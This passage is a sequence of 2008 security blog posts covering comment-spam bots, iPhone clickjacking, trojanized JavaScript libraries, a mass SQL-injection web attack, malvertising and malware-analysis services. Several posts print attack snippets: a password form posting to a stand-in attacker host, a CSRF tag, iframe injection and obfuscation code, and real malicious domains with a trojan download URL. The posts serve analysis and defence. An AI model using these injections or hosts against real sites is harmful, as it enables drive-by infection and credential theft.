The most interesting thing to note is that a few more comment spam applications/crawlers have made their way to my comment form. These new ones exhibit different behavior than the original one I reported on, thus I believe they are entirely different applications. For now, I’m going to stick to the original application I previously discussed; I'll compare my results to these newer spam apps in a future blog post.

One thing I noticed is that many of these comment spam attempts were coming from systems located on the 94.102.60.0/24 network. A large number of them were also using the User-Agent string "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)". Both of these factors turned out to be good indicators of whether the request was coming from a spam bot.
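Those two indicators are easy to turn into a quick filter. A simplistic sketch follows; note the string-prefix test only works because this happens to be a /24 aligned on a dotted boundary:

var SPAM_UA = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)';

function looksLikeSpamBot(ip, userAgent) {
  return ip.indexOf('94.102.60.') === 0 || userAgent === SPAM_UA;
}

console.log(looksLikeSpamBot('94.102.60.17', 'Mozilla/5.0')); // true

The User-Agent is trivially forged, of course, so treat a match as one signal rather than proof.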

Anyways, here is an example of one submission I received. The names at the beginning of each line are the name of the form field; all of the fields are text input fields (as in, "<input type=text>"), except for 'other' and 'comment' which are textarea fields.

eml: YkfxeDeZjHR
email: fbkixy@nphddy.com
name: fvkijvn
phone: CdGpbMFbxGDygCwy
address: ouUMHxpoxwn
url: http://vfokgivkywst.com/
link: geEKiJfvkyRC

other: TyhYgb <a href="http://xnhqpiemubkx.com/">xnhqpiemubkx</a>, [url=http://fiukrdabbaut.com/]fiukrdabbaut[/url], [link=http://zrywxdmvlfzv.com/]zrywxdmvlfzv[/link], http://klhtciqjlkxr.com/

comment: TyhYgb <a href="http://xnhqpiemubkx.com/">xnhqpiemubkx</a>, [url=http://fiukrdabbaut.com/]fiukrdabbaut[/url], [link=http://zrywxdmvlfzv.com/]zrywxdmvlfzv[/link], http://klhtciqjlkxr.com/

The most obvious thing visible from this data is that the application filled in all fields with random garbage. It managed to put something that resembled an email address into the 'email' field, but not the 'eml' field (which is the actual email address field shown to the user for data entry). The application also managed to put a URL into the 'url' field, but not the 'link' field. This makes me believe the application is pre-programmed with a few specific field names where it will submit data of a specific format. Also interesting/notable is that the application submitted the same blob of link garbage to both textarea fields ('other' and 'comment'), and not to any of the text input fields.

In addition to the form fields that were submitted, I collected some other pieces of information to gauge the depth of the spamming application. I discovered that cookies were indeed supported--at least, I could set a cookie on the form display page and the bot would carry that cookie over with the form submission. Hidden form fields were not altered and properly submitted with the rest of the form data. I also found that Javascript is not supported by the application...which is no surprise.

Another thing I failed to notice before is that the application does actually have the ability to handle multi-step submissions. I recognized the behavior in my logs: whenever the form was submitted, the same user-agent would then go through every link on the page (in exact order of appearance, no less) and subsequently request it. I assume this behavior is to deal with web applications that return a "thank you for your submission" page along with a link taking you back to the forum/comment area where the new submission will appear.

Interesting info, perhaps. But I've grown bored with this particular application and its lack of intelligence; the newer bots I've been seeing have actually been doing a lot more interesting things. I will take a deeper look at these new bots, and how they differ, in my next blog post. After that, I'll share a few effective tricks I've been using to tell these spam bots apart from the humans (without CAPTCHAs!).

Until then!
- Jeff

Wednesday, November 26, 2008

Clickjacking - iPhone Style

In the past, I've blogged about clickjacking and how to defend against it. While Adobe has patched Flash Player to protect against one of the more frightening attacks, which could lead to hijacking of a victim's webcam and microphone, many browsers and applications remain vulnerable. In fact, a few days ago, when Apple released the latest firmware for the iPhone (v2.2), it turns out that they quietly addressed what some consider to be a clickjacking vulnerability in Mobile Safari, the iPhone's web browser. It's definitely a different version of clickjacking and it would be fair to argue that it's a different vulnerability altogether but it is interesting nonetheless, so for the sake of argument (and blog hits) I'll stick with the clickjacking title and describe in greater detail the unique aspects of this vulnerability.

Mobile Safari was not actually vulnerable to the 'traditional' version of clickjacking, but it is susceptible to this new variant, which was discovered by John Resig and reported to Apple (CVE-2008-4232). There is no proper definition for clickjacking, but I'll define it as "obfuscating web page content, in order to social engineer a victim into performing an action other than what was intended". Now I'll split clickjacking into the following categories:
  1. Layered Clickjacking - When Jeremiah Grossman and Robert Hansen first discussed clickjacking, they detailed how the use of z-index values in Cascading Style Sheets (CSS) could be used to layer content on top of other content. Then, leveraging CSS opacity values, the transparency of the layered content could be adjusted to show content on the bottom, while hiding the content on top, which is actually interacted with. A demonstration of this technique is available here.
  2. Overflow Clickjacking - The iPhone vulnerability does not require z-index or opacity values. Instead, the problem stems from the fact that the content of an embedded IFRAME can be forced to overflow its bounds and spill onto the parent page. This is accomplished by adjusting the size of the IFRAME leveraging CSS transforms, which are supported by the webkit engine.
Rather than talking about it, let's see overflow clickjacking in action.

[iPhone Clickjacking Demo: Fig 1 - Not Vulnerable; Fig 2 - Vulnerable]
In Fig 1 (not vulnerable), you can see both the IFRAME content and the page content. Both have identical forms for password submission, but the IFRAME form is submitted to the attacker controlled page. In Fig 2 (vulnerable), you can see that the evil IFRAME has overwritten the page contents and we only see one (evil) password submission form.
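For reference, the framed (attacker-controlled) content in a demo like this amounts to something like the following. This is my own reconstruction of the technique, not Resig's demo code, and the URL is a placeholder; a patched browser clips the scaled content to the IFRAME's declared box, while vulnerable Mobile Safari versions let it spill onto the parent page.

// Served from the attacker's page that the victim page embeds in an
// IFRAME. The webkit-specific transform scales the content far beyond
// the IFRAME's declared width/height; 'attacker.example' is a
// placeholder for the attacker-controlled collection point.
document.write(
  "<div style='-webkit-transform: scale(4); -webkit-transform-origin: 0 0;'>" +
  "<form action='http://attacker.example/steal' method='post'>" +
  "Password: <input type='password' name='pw'> " +
  "<input type='submit' value='Log in'>" +
  "</form></div>"
);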

While this is interesting, in reality it comes with some very real limitations that will restrict the usefulness of the attack. In order to be valuable, we need a situation where an attacker controls the content of an IFRAME on a targeted page. This could occur with mashups or banner ads. An attacker could deliver IFRAME content to a subscribing web page and overwrite a portion of the parent page. They would, however, need to know which page was pulling the content so they could properly align the new content and make for a convincing attack.

I expect that we'll see a whole host of clickjacking-esque attacks in the coming months, affecting various browsers/applications. The ability to format page content via CSS, DHTML, etc. and improper implementations of these standards leaves plenty of room for error.

Happy Thanksgiving!

- michael

Technical Quickie: building SpiderMonkey on FreeBSD 6.2 AMD64

I wanted to get Didier Stevens' modified SpiderMonkey Javascript engine compiled and running on a FreeBSD 6.2 AMD64 box. It turns out the config files shipped with his 1.7.0 version do not include FreeBSD support, so I wound up having to hack something together...and I thought I would share what I did in case others are interested. I assume these instructions would be relatively applicable to later FreeBSD versions as well.

When you go to build the source, config.mk pulls in an appropriate file in config/ to use for your system. On FreeBSD 6.2 AMD64, the output of 'uname -s' and 'uname -r' essentially leads to the config file named 'config/FreeBSD6.2-RELEASE.mk'. So what I wound up doing was to go into the config/ directory and copy the 'Linux-All.mk' file to 'FreeBSD6.2-RELEASE.mk'.

If we were building on an x86 (32-bit) FreeBSD platform, that might be all we need to do. However, since we're building on AMD64 (64-bit), this configuration file needs to be modified because the default Linux configuration file references 64-bit CPU architecture as 'x86_64'; on FreeBSD AMD64, the CPU architecture is reported as 'amd64'. Fortunately the fix is simple: just do a find/replace on all values of 'x86_64' and change them to 'amd64'. There are three changes total.

Now that you've made those changes, you should be all set. Just build the application ("gmake -f Makefile.ref") and then grab the 'js' binary out of the 'FreeBSD6.2-RELEASE_DBG.OBJ/' directory.

Enjoy.

- Jeff

Not all P2P is evil

Allow me to step up on this conveniently available box of soap for a minute. I can't tell you the number of discussions I’ve been in where my conversation partner erroneously assumed that "P2P" was strictly synonymous with file sharing, copyright infringement, bandwidth hogging, and corporate time wasting. My viewpoint is that the term "P2P" references a specific network/communication design (i.e. arbitrary peers talk to other peers, rather than clients talk to dedicated servers), and not a particular usage. In other words, P2P is a communication technology platform that is agnostic to the application built on top of it. There are video delivery applications, file sharing applications, VoIP applications, IM applications, and privacy shielding applications that are built using P2P as their communication framework. You cannot define P2P as being any single one of those (particularly file sharing); and there are many legitimate uses for many of those listed applications. In fact, many businesses use functional non-P2P alternatives of those same types of applications on a daily basis.

Now, I completely understand and agree that P2P has received this bad reputation because the earliest adopters of the P2P communication model were applications that many organizations consider questionable. That's why I'm always happy to find uses of P2P that provide a positive benefit. A recent example I ran across was the Network Early Warning System (NEWS), which uses P2P communication to cross-talk and alert about network connectivity and traffic issues. The Northwestern University Aqualab (creators of NEWS) liken NEWS to a "neighborhood watch for the Internet," with particular benefits to ISPs. Aqualab also has many other ongoing projects that relate to improving the performance and scalability of P2P communication models.

There is also Pando, a company that offers what they call a "peer assisted" content delivery service that is targeted to businesses needing to deliver large amounts of media to their users. Basically they have married the traditional CDN concept with a P2P communication and distribution model, resulting in something they say scales significantly better (and thus costs less) than the traditional CDN approach. As an aside, our research shows that Pando is actually a tweaked version of BitTorrent that runs over standard SSL, which allows it to be served over port 443 with ease.

So the next time someone says "P2P is evil," remind them that P2P is just a platform utilized by many different applications, and they should clarify which P2P application(s) they have in mind.

- Jeff

Thursday, November 20, 2008

Trusted Computing is Chasing Yesterday's Problems

Earlier this week I was able to stop by the CSI 2008 conference. I was only able to take in a couple of the presentations, including a keynote by Steve Hanna, a Distinguished Engineer at Juniper Networks. Steve was speaking about trusted computing, explaining what it is and how it will tackle some of the security problems that we face. Now I'll confess that I've never been completely sold on the concept of trusted computing. I've tended to view it as somewhat of an ivory tower initiative that might work fine in a structured, high-security environment such as a DoD network, but not overly practical for the 'real world'. That said, Steve made some strong points about the value of trusted computing and argued that it's closer to becoming a mainstream reality than I'd realized.

Steve detailed three primary layers for his vision of trusted computing:
  1. Trusted hardware - The Trusted Platform Module (TPM) has a unique, secret RSA key burned into it at the time of manufacture and can be used for hardware identification. The TPM specification was developed by the Trusted Computing Group and many chip manufacturers have included a TPM in laptop chip sets since 2006.
  2. Trusted Operating System - Projects such as the NSA High Assurance Platform Program seek to leverage the TPM to create the foundation of a secure operating system.
  3. Network Access Control - Protecting access to resources or network.
Now I can envision how such a system, if implemented, could go a long way towards limiting the spread of malicious code by ensuring that untrusted binaries are simply not permitted to execute on a given system. The problem with such an approach is that it works in opposition to the open nature of the Internet, a principle that we've come to know and love. Would users be willing to be restricted in the applications that can be run on their machines? I don't think so. In general we're willing to accept security risks in favor of an open architecture that allows flexibility. For proof, look no further than the cell phone industry. Cell phones were once inflexible boxes that ran specific applications, and if you didn't like it, you could buy another phone. Today however, telecoms are tripping over one another to show just how open they are and how they welcome third party applications. Will this break down barriers for mobile malicious code? Sure, but consumers don't care. They want flexibility.

My second concern with the vision for trusted computing is that it will do little to prevent web-based attacks, which don't require binary code execution; threats of this nature will only continue to grow. Take clickjacking, for example. This is really a social engineering attack: you convince someone to perform an action they did not intend, because you are able to manipulate the look and feel of the page they're viewing. Cross-Site Request Forgery (CSRF) is another great example. Once again, the attack leverages web functionality as it was designed. No binary execution is required.
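To illustrate, here is a classic CSRF sketch (the bank URL is hypothetical): nothing more than an image tag is needed. If the victim is already logged in, the browser silently attaches their session cookie and the forged request is honored, without any binary ever executing.

<!-- Hypothetical: the 'image' is really a state-changing request -->
<img src="http://bank.example.com/transfer?to=attacker&amp;amount=1000"
     width="1" height="1" alt="">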

After listening to Steve's keynote, I have a better understanding and appreciation for trusted computing. However, I'm more convinced than ever that it's focused on yesterday's attacks, while we as an industry need to be looking to tomorrow.

- michael

Monday, November 17, 2008

Hiding web 2.0 malware in plain sight

Hello everyone, Jeff Forristal here. I thought I'd take a moment to discuss a trend we're seeing in attacker tactics, and predict how it may evolve into what will become commonplace tomorrow.

Recently we ran across a modified version of Adobe's Javascript-based Flash detection script being used as part of a drive-by attack on web browsers. Basically, the malware writers took the Flash Player Version Detection v1.7 script (AC_RunActiveContent.js) and tweaked it with a malicious payload. The heart of the evilness was added with a single line towards the end of the script:

document.write("<i"+"fr"+"ame
src='http://__someplace__.com/
pdfdoc/index.php?id=com2'
width=1 height=1></ifr"+"am"+"e>");

This causes the script to write out an IFrame tag pointing to a malware site, which then tries to deliver exploits to the browser in an attempt to cause arbitrary code execution.

I'm willing to speculate that anyone doing a shallow or naive review of the script could prematurely conclude that it is the proper Adobe Flash detection script and dismiss it as non-evil. Hopefully, though, many investigators would plow through the entire file, eventually see the plain-as-day extra IFrame code, and thus see through the facade.

However, what if the IFrame code wasn't easily visible? Javascript 'packers' (programs that transform Javascript code into smaller, more concise code) are becoming the norm on the web for slimming down Javascript and saving transfer bandwidth. They work by rewriting the code, essentially obfuscating what is going on as a byproduct. This can make it much more difficult to understand what the Javascript is doing simply by casually perusing it; a simple 'document.write' of a malicious IFrame tag may not be so glaringly obvious anymore. And unfortunately, unlike executable (.EXE) packers such as UPX, Javascript packers are used by many web sites and projects for legitimate reasons...so the mere presence of a packed Javascript file isn't an immediate red flag of malicious intent (i.e. alerting on packed Javascript files is going to result in a lot of false positives).
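As a contrived illustration (not the output of any particular packer), here is the same IFrame injection from above after a simple encode-and-eval style transformation; the hostile intent is no longer obvious at a casual glance:

// Contrived example: URL-encoded markup hides the IFrame from a casual reading
var _0xa1 = "%3Ciframe%20src%3D%27http%3A%2F%2F__someplace__.com%2F" +
            "pdfdoc%2Findex.php%3Fid%3Dcom2%27%20width%3D1%20height%3D1%3E" +
            "%3C%2Fiframe%3E";
document.write(unescape(_0xa1));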

How does this help attackers? Well, even though alerting on every packed Javascript file is not recommended, packing should still at least raise the suspicion level. An attacker taking their 'evil.js' file and packing it might obfuscate what evil.js is doing, but the fact that it's a packed file of unknown function may still cause people to investigate. Instead, an attacker can extend the previously mentioned tactic of hiding a malicious payload inside a legitimate Javascript library...but this time, pick a library that is commonly distributed in packed form and widely used. For example, we see packed versions of the JQuery Javascript library quite often on many different sites. A clever attacker could take the (unpacked) jquery.js file, insert their malicious code, pack it using the same packer normally seen used with jquery.js, and then deploy it. Anyone encountering this malicious file, at first glance, may consider it to just be the usual packed jquery.js file and ignore it; any automated signatures meant to flag packed Javascript files would, on the surface, not really differentiate between the packed original version and the packed modified version. And any advanced investigation into the file by looking at the code's behavior (or 'unpacking' it via various means) will, at first, just seem to be the standard set of JQuery functionality. Only those who continue to persist past all the obvious signs that the file is a legitimate jquery.js Javascript file would perhaps encounter the maliciousness of this web 2.0 Trojan horse.

Fortunately there is a workable solution to this problem: whitelists of known-good Javascript file hashes. Since the obvious targets are widely-deployed Web 2.0 Javascript libraries (JQuery, Dojo, SWFObject, Prototype, etc.), it would be feasible to construct a whitelist of the true/safe versions of these popular library files. Of course, maintaining a whitelist is a time-consuming effort, especially with new versions of each library coming out so often. And site designers would need to be encouraged not to make any personalizations/modifications directly to these standard library files, lest they trigger the alarms. It would be interesting if such a whitelist were then utilized by browser extensions such as NoScript to know automatically which Javascript files are safe to execute...but vetting the function library is a minor part of the problem, since the site still needs custom Javascript to access/utilize the library in the first place.
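The check itself is straightforward. Here is a minimal sketch, assuming a Node.js-style environment and a hypothetical knownGood list of vetted hashes (the hash values shown are placeholders, not real):

var crypto = require('crypto');
var fs = require('fs');

// Hypothetical whitelist: SHA-256 hashes of vetted, unmodified library releases
var knownGood = {
  '4d0be7e3...': 'jquery-1.2.6.pack.js',
  '9a1174cc...': 'prototype-1.6.0.3.js'
};

function identifyScript(path) {
  var hash = crypto.createHash('sha256')
                   .update(fs.readFileSync(path))
                   .digest('hex');
  // A hit means a known-good library; a miss means the file deserves scrutiny
  return knownGood[hash] || null;
}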

It’s a hard problem still looking for a perfect solution (like many other security problems). Until next time,

- Jeff

Thursday, November 13, 2008

Stepping Through a Mass Web Attack

A few days ago, Kaspersky reported on yet another mass web attack. Such attacks are quickly becoming a preferred attack vector, as they permit mass infection with minimal effort. We've seen this before, and not just once. In fact, it seems to be popular among Chinese hackers and is often used to gather authentication credentials for online games. While it hasn't yet been verified, it appears that SQL injection flaws led to the initial server infections. All infected servers seem to be running Microsoft ASP pages, a common target for those seeking sites vulnerable to SQL injection.

I'm fascinated by such attacks as they illustrate the interconnected nature of the web and shatter the myth that you are safe if you stick to browsing reputable sites. Sadly, reputable sites struggle with vulnerabilities on a regular basis. The unfortunate reality is that any site, no matter how big or small, could be infected. In this latest attack, Travelocity was compromised. While vulnerable servers were infected, the true targets of these attacks are the end users who visit the sites. I've been preaching for some time now that we need to shift our focus from servers to browsers. We spend the majority of our security resources locking down servers and put minimal effort into protecting users browsing the web. Attackers have shifted their focus and we must do the same.

Attack Walk-Through

According to Kaspersky, the attack leverages multiple browser vulnerabilities and a variety of sites to host the attack scripts and malicious code. In order to better understand how these attacks succeed, let's walk through one such attack scenario, which was live at the time this post was written:

Step 1 - Server Infection

The attack begins by injecting code onto as many vulnerable web servers as possible. This is commonly accomplished via SQL injection. In this specific example, the following code was injected:

<script src="http://dbios.org/h.js"></script>

This code won't change the appearance of the page, so a victim has no way of knowing that the supposedly reputable page is actually launching an attack on his browser. A quick Google search illustrates the mass nature of the attack and reveals that many sites are still infected.

Step 2 - Redirects

The initial JavaScript file typically doesn't contain the ultimate attack, but rather calls a variety of other scripts from different locations. This may be done in part to obfuscate the attack but is more likely done simply to accommodate multiple vulnerabilities and download sites in order to make the attack more robust and reach as many potential victims as possible. In our case, the following two IFRAMEs are added to the page:

document.write("<iframe width='20' height='0' src='http://vvexe.com/haha/index.html'></iframe>");
document.write("<iframe width='0' height='0' src='http://www.kenya.com/faq.htm'></iframe>");


Step 3 - Exploitation

Kaspersky notes that this latest round targets a variety of vulnerabilities in web browsers and Macromedia Flash Player. In our example, the exploit goes after a vulnerability in the Snapshot Viewer for Microsoft Access ActiveX control, published on August 12, 2008 and detailed in MS08-041. One of the IFRAMEs contains code which attempts to instantiate the Snapshot Viewer ActiveX control, as shown below:

try{var n;
var ll=new ActiveXObject("snpvw.Snapshot Viewer Control.1");}
catch(n){};
finally{if(n!="[object Error]"){document.write("<iframe width=50 height=0 src=ff.htm></iframe>");}}

As can be seen, if the ActiveX control is indeed accessible, the browser opens yet another IFrame from http://vvexe.com/haha/ff.htm, and this is where the attack actually lies. The writers of this exploit are either not particularly skilled or just lazy, as they've leveraged an already public exploit line for line, changing only the target download to http://ip.kanlang.com/haha/down.exe.

Step 4 - Client Infection

The down.exe executable is a Trojan, which goes by various aliases, including Infostealer.Wowcraft. The Trojan serves as a keylogger and is designed to harvest and transmit authentication credentials for World of Warcraft.

Lessons Learned
  1. Surfing 'reputable sites' is not guaranteed to prevent infection.
  2. A server side compromise is often the first step in a client side attack.
  3. Defense in depth is critical. In this situation, the threat can be mitigated by patch management, network- and host-based AV, and blocking of malicious URLs.
Happy surfing!

- michael

Friday, November 7, 2008

Cloud Services for Analyzing Malware

Despite continuing promises from software vendors, malware isn't going anywhere. Analyzing malware, both to protect against it and to repair the damage it may have done, is a significant part of the job description for many security professionals. The sheer volume of malware can make dealing with it an overwhelming task. Fortunately, a number of free cloud-based services have emerged to aid in the task of analyzing malware.

I'll divide the analysis tools into two categories: Anti-Virus multi-scanners and sandboxes. The former is nothing more than a collection of AV engines designed to run together against the same file and return each vendor's verdict. This can be a very valuable starting point: it is frustrating to spend hours or days conducting deep analysis on a new binary, only to find out that AV vendors have already analyzed the same file. A quick run through a multi-scanner can help let you know whether you're dealing with 0day or yesterday's news. Sandboxes, on the other hand, are emulation environments which perform automated behavioral analysis on a binary file. They allow the binary to execute, emulate the services that it attempts to interact with, and record the activity which occurs, such as file reads/writes, registry access and network traffic.

AV Multi-Scanners

Building your own multi-scanner isn't a terribly difficult or expensive challenge. You need to obtain AV SDKs or command-line tools from various vendors, develop a wrapper/front-end to submit the same malicious code samples to all of them at the same time, and parse/combine the results into a meaningful report. It may be worth the effort if you expect to feed a heavy, regular volume of binaries into the multi-scanner, say from a honeypot network; if you're looking for only occasional analysis, there are free online alternatives.
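As a rough sketch of the wrapper idea (Node.js-style; the scanner names and command lines are made up for illustration, not real vendor tools):

var exec = require('child_process').exec;

// Hypothetical command-line scanners from different vendors
var scanners = [
  { name: 'VendorA', cmd: 'scana --quiet ' },
  { name: 'VendorB', cmd: 'scanb -file ' }
];

function multiScan(sample) {
  scanners.forEach(function (s) {
    exec(s.cmd + sample, function (err, stdout) {
      // Each vendor formats output differently; real code would parse per vendor
      console.log(s.name + ': ' + (stdout || '').trim());
    });
  });
}

multiScan('suspect-sample.exe');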

Below is a chart comparing the functionality of two popular (and free) multi-scanners:

                     VirusTotal   VirScan.org
No. of Engines       34           39
Zip support          No           Yes
Web Submissions      Yes          Yes
Email Submissions    Yes          No
SSL Support          Yes          No


Sandboxes

Sandboxes automate the process of behavioral analysis. They permit a binary to execute in a controlled environment and monitor the activity which occurs. Given that we're dealing with malicious code, the binaries will generally attempt to spread, often by scanning for vulnerable hosts. Rather than actually permit the malware to spread externally, sandboxes can simulate network responses, allowing the binary to continue executing without actually permitting third-party infection. If a steady volume of analysis is required, you'll want to consider commercial products such as those offered by Norman and Sunbelt Software; however, such solutions can be expensive. If you only require periodic analysis, both vendors offer free web-based access to their platforms. Anubis, by contrast, is purely a free web-based service and does not have a commercial product offering.
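To give a feel for the network-simulation piece, here is a minimal sketch (Node.js-style, assuming the sample's traffic has been redirected to this host): answer every HTTP request generically while logging what the sample asked for.

var http = require('http');

http.createServer(function (req, res) {
  // Record the malware's network activity for the behavioral report
  console.log(req.method + ' ' + req.url);
  // Answer generically so the sample keeps executing without real-world contact
  res.writeHead(200, { 'Content-Type': 'text/html' });
  res.end('<html>OK</html>');
}).listen(80);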

The chart below compares the functionality of these three cloud-based sandboxes:

                      Anubis   Norman Sandbox   CWSandbox
URL Analysis          Yes      No               No
Zip Support           Yes      No               No
SSL Support           Yes      No               No
Email Results         Yes      Yes              Yes
Dependent Binaries    Yes      No               No


As can be seen, for an entirely free service, Anubis has an impressive feature set. They even encourage the automated submission of binaries for analysis, so the platform can be integrated into a honeypot network.

It's great to see free resources emerging for malware analysis. As mentioned, these free services won't meet everyone's needs, but if you're tasked with securing a network and only occasionally need analysis capabilities, these sites can significantly streamline your efforts.

- michael

Trust two times removed

Hello everyone, Jeff Forristal here. I thought I'd take a moment to discuss a real-life security incident that I recently reviewed in post-mortem fashion. The plot is simple: while the person was surfing the web, their browser was exploited by a piece of malware targeting a popular browser plugin. However, it's the details that make this story a bit intriguing...and scary.

The person's surfing session was quite normal and not particularly careless. During the moments just before the incident, the person was using Google to find an answer to a technical question. One of the top search results was for a smaller site that hosted technical tidbits of information collected and donated from various sources. The person clicked through to that site. Now, this is not a site that would be considered to have a 'risky' reputation, nor does it harbor any direct malware. It's just a normal, basic site that looks to be someone's personal project (the site was designed in FrontPage 6.0!) to better the world by collecting and publishing useful information. In fact, the only thing questionable about it is the number of syndicated ads on the page: 7, by our count, from multiple vendors (BidVertiser, Google, Clicksor, and FastClick). Of course, it makes sense that they would (over-)populate their page(s) with ads in an attempt to generate revenue from their content publishing efforts. But this turned out to be the problem.

See, once the person's browser landed on this ad-infested page, the browser started running around like mad to fetch all the syndicated ad content. Each ad syndication attempt usually results in multiple browser requests, because the main request to the ad syndicator often results in a chain of redirects, eventually landing at the specific content of the "advertisee" utilizing the syndication service. As the term 'syndication' implies, the ad services are just the middleman between the web site and the advertisee. And the web site is just the middleman between the ad service and the web surfer.
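As a rough illustration (all hostnames hypothetical), a single ad slot can fan out into a request chain like this before any pixel is drawn:

GET http://personal-site.example/tips.html            (the page the user visited)
  -> GET http://ads.syndicator.example/serve?slot=3   (browser fetches the ad slot)
  -> 302 to http://exchange.example/win?bid=4711      (syndicator redirects)
  -> 302 to http://advertisee.example/creative.html   (the advertisee's arbitrary HTML)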

Anyways, what eventually happened is that one of the ad syndicators served up an advertisee's ad...and it just so happened that the ad was actually a piece of malware that could immediately compromise the vulnerable browser plugin. This is not necessarily news; attackers have been known for quite a while to leverage advertising syndication as a way to spread their malware. But it's a bit scary to witness in action, and the growing amount of advertising syndication utilized by web sites is going to make it a more predominant malware delivery vector. The problem is exacerbated by the fact that ads are no longer simple graphics; advertising syndicators usually allow their clients (the advertisees) to specify arbitrary HTML. This gives the advertisee carte blanche to use rich media ads that rely on multiple technologies such as DHTML, Javascript, Flash, etc. But it also gives an attacker full access to syndicate any arbitrary piece of malware that could be hosted/served via a normal web page. (Side note: maybe Google is onto something by only using pure text-based ads; the text is very easy to validate and stands practically no chance of harboring a piece of malware...)
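To make that concrete, a hypothetical rich media "creative" could look like the following; the same slot that renders the banner quietly pulls in an exploit page:

<!-- Hypothetical ad creative submitted as arbitrary HTML -->
<div>
  <img src="http://ads.syndicator.example/banner4711.gif" width="468" height="60">
  <!-- the malicious part: an invisible frame fetching exploit code -->
  <iframe src="http://advertisee.example/exploit.html" width="1" height="1"
          style="visibility:hidden"></iframe>
</div>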

What does this all mean? Well, there are a few things. First, all of those vendors who suggest an exploit is partially mitigated by the requirement that a "user must visit a malicious web page in order to be attacked" need to change their tune, because advertising syndication is essentially bringing the malicious web pages (via rich media ad capabilities) to the user. Second, the onus is on the advertising syndication services to ensure their clients aren't trying to deliver malware ads through the service. That's a tall order, and the ad vendors have not exactly been batting a thousand. Third, in the age of mashups and syndication, a user no longer decides only whether they trust the destination web site; they must now trust all the components that are mashed and syndicated into that site, and in turn trust all the components those components use, and so on. In the incident I just described, we have the person trusting the web site, the web site trusting the advertising services, and the advertising services trusting their clients. Thus we come to having trust two times removed. Worse, web browsers do not equip people with the tools necessary to manage this trust chain effectively; it's pretty much an all-or-nothing shot based upon the user's trust of the immediate target web site. In the meantime, browser plugins like Adblock Plus and NoScript could help, although that essentially robs legitimate sites of advertising revenue. However, if enough users start to use ad blocking software as a matter of security, perhaps the advertising services will become pickier about their clientele and better scrutinize what they are actually syndicating.

Only time will tell, I suppose.
- Jeff

ps. if you are interested in which advertising vendor was the 'enabler' for the mentioned incident, well, we cannot say with 100% certainty. But there does seem to be a popular opinion against one of the vendors.

Friday, October 31, 2008

First encounters with a web comment spammer

Jeff Forristal here. I run a couple of personal web sites that host the usual gamut of material found on personal web sites (pictures of my kids and family, my latest favorite LOLcat graphic, etc.). Recently I updated one of my sites and added a new comment/contact submission form so I wouldn’t have to expose my email address for spam harvesters to find. A mere few hours after enabling this new comment submission form on my web server, I started to get some comments; unfortunately they were all comment spam.

Of course, web comment spamming has become yet another fact of life on the Internet. Blogs and forums with unmoderated/open comment submission functionality are quickly getting clogged with random and off-topic spam. Basically the spammers are taking the content they would normally send you in email, and now posting it to web site forums and blogs too. This is why comment moderation and CAPTCHAs are becoming the norm for forum and blog comment posting.

Anyways, there is nothing all that exciting about receiving spam of any variety. However, the nature of the comment spam I received caught my eye. Over the course of a few weeks, I received multiple comment spams that all had the same format, but different random values.

Two examples of the comment spam I received were:

Email: cdbiib@orhabg.com
Comment:
jJsAdx <a href="http://aereogakjvpd.com/">aereogakjvpd</a>, [url=http://ubfcdpkfggto.com/]ubfcdpkfggto[/url], [link=http://wiogiusmvjcz.com/]wiogiusmvjcz[/link], http://ejmugotxbmqc.com/


Email: thowea@snkkjo.com
Comment:
fHwI3w <a href="http://uwtsayqpclib.com/">uwtsayqpclib</a>, [url=http://wetpnicpwkfd.com/]wetpnicpwkfd[/url], [link=http://bvtyjneqigek.com/]bvtyjneqigek[/link], http://prcghesjscpl.com/

We can make an educated guess that this comment submission isn't directly about blindly shoving links onto sites in order to bolster incoming link counts (inflating PageRank and aiding SEO efforts), because all the links are random and don't reference real sites. The submitted data has no practical value in itself, except as a probe to see what comes out the other side of the submission process. The data contains four different link formats (an actual HTML <A> tag, two flavors of popular bulletin board markup tags, and a raw URL), and perhaps a fifth if you count the email address too. That makes me believe the end goal was probably to find a way to inject a clickable link of some sort. Had the action been successful, perhaps the same software would have subsequently tried to inject more meaningful links (back to our SEO theory). Or perhaps this was just a precursor scouting application compiling a list of URLs known to allow arbitrary link injection (such lists are commonly paired or sold with spamware/crimeware apps used to inject content onto listed sites already known to be open to receiving the injection).

Of course, being the curious individual that I am, I started to wonder:

  • The app managed to put something resembling an email address into the email field. Now, sure, the form field name was ‘email’, so it wouldn’t be that hard to deduce; what would happen if I named that field something less obvious ('mail', 'eml', 'e', 'foo')?
  • The links were submitted in a textarea field; will it submit the same type of data in a more constrained input text box?
  • Will it try to inject content into other identifiably named fields, such as 'phone', 'address', 'url', etc.?
  • Does the app support cookies? Is it a well-behaved web user agent? How smart is it?
  • Can the app's injection logic handle multi-step submissions, where you submit to one page/place and the data eventually appears on a different page/place but not within the actual submission response (think: you submit a comment, you get a page that says "thank you", but then have to click one more link before you get to where your comment is actually displayed)?
  • And of course, the million dollar question: what would have happened had their injection succeeded and produced a clickable link?

I’m not one to leave such important questions burning on my mind (heh), so I came up with a plan to get the answers I want. I will lay a trap for the comment spammer (or rather, their app). The idea is simple: through the magic of some server-side logic, I will detect when this comment spamming app is making submissions to my forms (assuming they come back in the future; but historically they seem to visit me on a fairly regular basis, so it seems a safe assumption). Rather than display the usual "thank you for your submission" response, I’ll instead feed a specially crafted response to make it seem like the submission actually produced a clickable link (making me look vulnerable). Further, I will then flag that session/IP as a spammer, and all subsequent requests will result in some extra forms being added to the web page responses. Those forms will be designed with certain characteristics meant to gauge the effectiveness and operation of the application and its web crawler; I’m assuming the app will repeat its typical injection testing process for as many forms as it encounters.
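Here is a minimal sketch of the trap (Node.js-style; the spam signature, field names, and decoy form are my assumptions for illustration, not the final implementation):

var http = require('http');
var qs = require('querystring');
var flagged = {};  // IPs that have already matched the spam signature

http.createServer(function (req, res) {
  var ip = req.connection.remoteAddress;
  if (req.method === 'POST' && req.url === '/comment') {
    var body = '';
    req.on('data', function (chunk) { body += chunk; });
    req.on('end', function () {
      var comment = qs.parse(body).comment || '';
      // Telltale probe format: [url=...] / [link=...] markup plus raw URLs
      if (/\[url=http|\[link=http/.test(comment)) {
        flagged[ip] = true;
        // Play vulnerable: echo the comment so the injected link looks live
        res.end('<html><body>Latest comment: ' + comment + '</body></html>');
        return;
      }
      res.end('<html><body>Thank you for your submission.</body></html>');
    });
    return;
  }
  // Flagged visitors see extra decoy forms designed to gauge the app's logic
  var decoy = flagged[ip]
    ? '<form method="post" action="/comment">' +
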